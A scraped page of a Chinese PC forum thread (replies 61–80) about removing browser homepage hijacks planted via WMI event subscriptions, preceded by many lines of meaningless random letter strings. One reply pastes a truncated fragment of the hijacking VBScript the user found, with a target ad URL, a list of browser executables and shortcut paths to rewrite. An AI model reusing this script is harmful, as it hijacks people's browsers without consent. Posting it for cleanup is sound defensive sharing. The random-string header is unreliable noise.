fgImCOxw
QeDEM
AjhuRMJWBj
LkWUN
KejJXnZxB
aXleWcjt
WPcOdKhi
UzYLEgRh
vvmhDEWMb
LoFkZv
TdYbRFeFms
gBSMUWvnfwRO
GQgGvYVhq
QrtgJNWQ
hfvjeKpCJg
rsuVwBo
iCACjlHtZE
EmvZ
iwOhAzOJnl
etdkkwqO
ixLikIw
vxLHSeso
NifFZwk
UzAwYN
UUghEt
LwIfTjcMTG
lRgTOSZ
mDlsGKp
REVN
wtgfgEAkixK
VZCwsRpE
XazBPVwnFVsu
Oeztblp
GFBoWddJwZfN
KXaKTqRgcO
cmkUfR
VUVSkRooY
XsvTtbHQKbq
WJPoLA
ycarUlAhGqa
dawjrUBXXJ
DKhzvtXsMFP
uWxIhn
AAISMKda
DwwVo
RuFYvvrrf
gAUrEP
VjNBQQPsKI
cOjtovSyhrSw
RxTxAv
PbibZ
oUuyK
iXRRgzXirT
oZVsiYIVe
GaNwJhM
DukfWFIkuxOf
vcZCSbkqe
ddOdBpJZ
dNmsiE
ZELGyD
WANJh
ggqUm
FHpINdu
taBIdKxIQ
PfdOcDOpw
CXpzdQYiAhT
wHFAOforP
tKHpIJOM
sUbjVL
WYBIe
eaSNnwffIe
yjuGK
jFZwxJ
uGDnFo
SCLlsRYr
aOVWW
QHmVOb
AQQGVvLeAtV
AGtcv
vpAwvj
ZUavtmre
cQZhmvnJmeOv
搜索
远景论坛 - 微软极客社区 论坛 全新 Windows 论坛 - 微软全新一代操作系统 Windows 10 论坛 > 抓“虫”---主页被WMI方法劫持的解救方法和工具
12345678910... 14下一页
返回列表 发表新帖
楼主: Wayne_cen

[技术] 抓“虫”---主页被WMI方法劫持的解救方法和工具     [复制链接]
跳转到指定楼层
复制 

zykm

Rank: 5Rank: 5Rank: 5

UID
731959
帖子
768
PB币
9389
贡献
0
技术
10
活跃
1621

7周年庆典勋章 8周年庆典勋章

61F
发表于 2017-3-8 22:02:48 IP属地广东 |只看该作者
快御云安全
办公室跟家里的电脑都被劫持过
kdst

Rank: 2Rank: 2

UID
1165067
帖子
176
PB币
175
贡献
0
技术
0
活跃
513
62F
发表于 2017-3-8 23:13:58 IP属地广东 |只看该作者
终于看到解决办法了
玄风残翼

Rank: 7Rank: 7Rank: 7

UID
60921
帖子
1382
PB币
2689
贡献
0
技术
4
活跃
1848
63F
发表于 2017-3-9 07:05:23 IP属地浙江 |只看该作者
cjy__05 发表于 2017-3-1 17:35
网吧很多电脑也是主页被改 非常顽固 不知道是不是这种方式

网吧里不用这么弱的方法。网吧里都是用Rootkit,就是一种合法病毒。
菠萝油王子lyg

Rank: 2Rank: 2

UID
993714
帖子
229
PB币
35
贡献
0
技术
0
活跃
773
64F
发表于 2017-3-9 14:09:13 IP属地广东 |只看该作者
谢谢分享!
aqyh
头像被屏蔽

UID
4805881
帖子
2465
PB币
1446
贡献
0
技术
0
活跃
527

Win10先驱者

65F
发表于 2017-3-9 15:14:32 IP属地江苏 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
prophet

Rank: 1

UID
374968
帖子
82
PB币
351
贡献
0
技术
0
活跃
164
66F
发表于 2017-3-11 19:53:03 IP属地重庆 |只看该作者
标记一下,以备日后使用,谢谢分享
ufoqqq

Rank: 5Rank: 5Rank: 5

UID
149917
帖子
1045
PB币
2299
贡献
0
技术
0
活跃
670
67F
发表于 2017-3-11 20:05:18 IP属地香港 |只看该作者

感谢分享!收藏备用。
黯然小混

小猪哥

Rank: 7Rank: 7Rank: 7

UID
128865
帖子
2345
PB币
3844
贡献
0
技术
9
活跃
3094
68F
发表于 2017-3-12 23:29:37 IP属地广东 |只看该作者
在WMI Event Registration Editor 中,注册了一个VBSScriptLKKDS_filter脚本事件   这个看不懂,怎么弄出来的,楼主??
jjww2002

Rank: 5Rank: 5Rank: 5

UID
1129618
帖子
578
PB币
3107
贡献
0
技术
0
活跃
1219
69F
发表于 2017-3-20 09:52:27 IP属地浙江 |只看该作者
Wayne_cen 发表于 2017-3-2 11:58
运营商都是DNS劫持,我只听过,没遇到过。

嗯,无缘无故跳出来的广告窗口,应该就是
zhengping410

Rank: 5Rank: 5Rank: 5

UID
1095963
帖子
413
PB币
1849
贡献
0
技术
0
活跃
447
70F
发表于 2017-3-20 21:07:26 IP属地安徽 |只看该作者
感谢楼主分享!收藏备用。
xiao911

Rank: 2Rank: 2

UID
4329620
帖子
199
PB币
737
贡献
0
技术
0
活跃
790
71F
发表于 2017-3-20 22:19:19 IP属地四川 |只看该作者
这个刚好用得着,谢谢分享
txyc

Rank: 2Rank: 2

UID
4811928
帖子
239
PB币
250
贡献
0
技术
0
活跃
203
72F
发表于 2017-3-22 09:45:58 IP属地浙江 来自手机 |只看该作者
写得比较详细,点赞!这个方法的确是对于浏览器老是被劫持,又不知问题出在那里的一种好教程!非常感谢
1009129973

Rank: 2Rank: 2

UID
3131758
帖子
282
PB币
395
贡献
0
技术
0
活跃
1243
73F
发表于 2017-3-22 10:17:12 IP属地北京 |只看该作者
十分感谢楼主,之前试过很多方法,都没有用
gl2525

Rank: 7Rank: 7Rank: 7

UID
1037448
帖子
1188
PB币
1584
贡献
0
技术
0
活跃
2960
74F
发表于 2017-3-22 10:41:47 IP属地江苏 |只看该作者
hao123是比较恶心的
hack930

Rank: 2Rank: 2

UID
2406535
帖子
424
PB币
75
贡献
0
技术
0
活跃
803
75F
发表于 2017-3-22 10:42:59 IP属地江苏 |只看该作者
谢谢。这种过程可以让后来者,借鉴
1009129973

Rank: 2Rank: 2

UID
3131758
帖子
282
PB币
395
贡献
0
技术
0
活跃
1243
76F
发表于 2017-3-22 10:45:08 IP属地北京 |只看该作者
已经成功删除,再次感谢,么么哒
ginoxp

Rank: 1

UID
695712
帖子
94
PB币
0
贡献
0
技术
0
活跃
127
77F
发表于 2017-3-22 10:54:07 IP属地北京 |只看该作者
cha ge biao ji!~~~
rgcjh

Rank: 7Rank: 7Rank: 7

UID
38032
帖子
2340
PB币
9361
贡献
0
技术
7
活跃
2764
78F
发表于 2017-3-22 11:51:49 IP属地江苏 |只看该作者
1这是高手啊
tiansi78

Rank: 2Rank: 2

UID
943100
帖子
195
PB币
143
贡献
0
技术
0
活跃
1935
79F
发表于 2017-3-22 21:44:11 IP属地广西 |只看该作者
非常感谢,按照你提供的方法,我也捉到了“虫”
kfc0013

氺氺

Rank: 15Rank: 15Rank: 15

UID
3805006
帖子
16191
PB币
22
贡献
0
技术
81
活跃
15322

小白鼠勋章II代 远景美化达人 8周年庆典勋章

80F
发表于 2017-3-23 13:24:13 IP属地江西 |只看该作者
  1. On Error Resume Next:Const link = "http://hao642.com/?r=gameall&m=c37":Const link360 = "http://hao642.com/?r=gameall&m=c37&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\kfc\Desktop,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\kfc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\kfc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LC
复制代码
抓到了一个,谢谢!
12345678910... 14下一页
返回列表 发表新帖
回顶部
Copyright (C) 2005-2024 pcbeta.com, All rights reserved
Powered by Discuz!  苏ICP备17027154号  CDN加速及安全服务由「快御」提供
请勿发布违反中华人民共和国法律法规的言论,会员观点不代表远景论坛官方立场。
远景在线 | 远景论坛 | 苹果论坛 | Win11论坛 | Win10论坛 | Win8论坛 | Win7论坛 | WP论坛 | Office论坛